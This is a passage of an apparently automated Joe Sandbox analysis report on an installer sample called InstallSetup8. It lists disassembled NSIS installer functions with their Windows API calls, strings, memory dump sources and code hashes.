SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
GetShortPathNameW.KERNEL32(?,00430108,00000400,?,?,00406338,?,?), ref: 004061E1

Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

GetShortPathNameW.KERNEL32(?,00430908,00000400,?,00000000,?,?,00406338,?,?), ref: 004061FE
wsprintfA.USER32(0042FD08,%ls=%ls,00430108,00430908,?,?,00406338,?,?), ref: 0040621C
GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
GlobalFree.KERNEL32(00000000,0040A580,00000000,00000000,?,?,?,?), ref: 00406305
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Strings

[Rename], xrefs: 00406286, 00406298
%ls=%ls, xrefs: 00406212

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
Opcode Fuzzy Hash: 67e7abcb15a3b792ff514517dbaa51231beb97817eaf9b334bdc8e12bec0558b
Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(00009292,00441800,0043F000), ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,00442800,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNEL32(00000040,?), ref: 00403231

Strings

soft, xrefs: 00403170
Inst, xrefs: 00403167
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
Error launching installer, xrefs: 004030D2
Null, xrefs: 00403179

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-527102705
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406594 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 204stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004066B6
GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004066CC
SHGetPathFromIDListW.SHELL32(00000000,004326A0,?,00000000,00000007), ref: 0040672A
CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 0040675E
lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004067B8

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406687
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406758

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4024019347-730719616
Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00403323
GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32(?,... %d%%,00000000), ref: 00403406

Strings

*B, xrefs: 004032E4
A, xrefs: 00403483
A, xrefs: 00403379
... %d%%, xrefs: 00403400

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB,?), ref: 0040455A
GetSysColor.USER32(00000000,?), ref: 00404598
SetTextColor.GDI32(?,00000000,?), ref: 004045A4
SetBkMode.GDI32(?,?,?), ref: 004045B0
GetSysColor.USER32(?), ref: 004045C3
SetBkColor.GDI32(?,?), ref: 004045D3
DeleteObject.GDI32(?), ref: 004045ED
CreateBrushIndirect.GDI32(?), ref: 004045F7

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004055DC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,000091FE), ref: 00405637
SetWindowTextW.USER32(0042BA48,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D), ref: 00405649
SendMessageW.USER32(?,00001004,00000000,00000000,0042BA48,00000000,?,000091FE), ref: 0040566F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
GetMessagePos.USER32 ref: 00404EB4
ScreenToClient.USER32(?,?), ref: 00404ECE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06

Strings

f, xrefs: 00404EE2

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
MulDiv.KERNEL32(?,00000064,?), ref: 00402FE1
wsprintfW.USER32(?,verifying installer: %d%%,00000000), ref: 00402FF1
SetWindowTextW.USER32(?,?), ref: 00403001
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013

Strings

verifying installer: %d%%, xrefs: 00402FEB

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?,?,?,00000000,?), ref: 00402A0B
GlobalFree.KERNEL32(00000000,?,00000000,?), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406805 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
CharNextW.USER32(?,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
CharPrevW.USER32(?,?,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

Strings

*?|<>/":, xrefs: 00406857

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD

Uniqueness

Uniqueness Score: -1.00%

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004068F2
wsprintfW.USER32(?,%s%S.dll,00000001,?), ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

%s%S.dll, xrefs: 00406927
UXTHEME, xrefs: 004068E4

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D,0040341D,0042BA48,00000000,?,000091FE), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48,00000000,?,000091FE,?,?,?,?,?,?,?,?,?,0040341D), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000,0042BA48,00000000,?,000091FE), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105,?,?,00100020,?,?,?), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?,00000003,?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
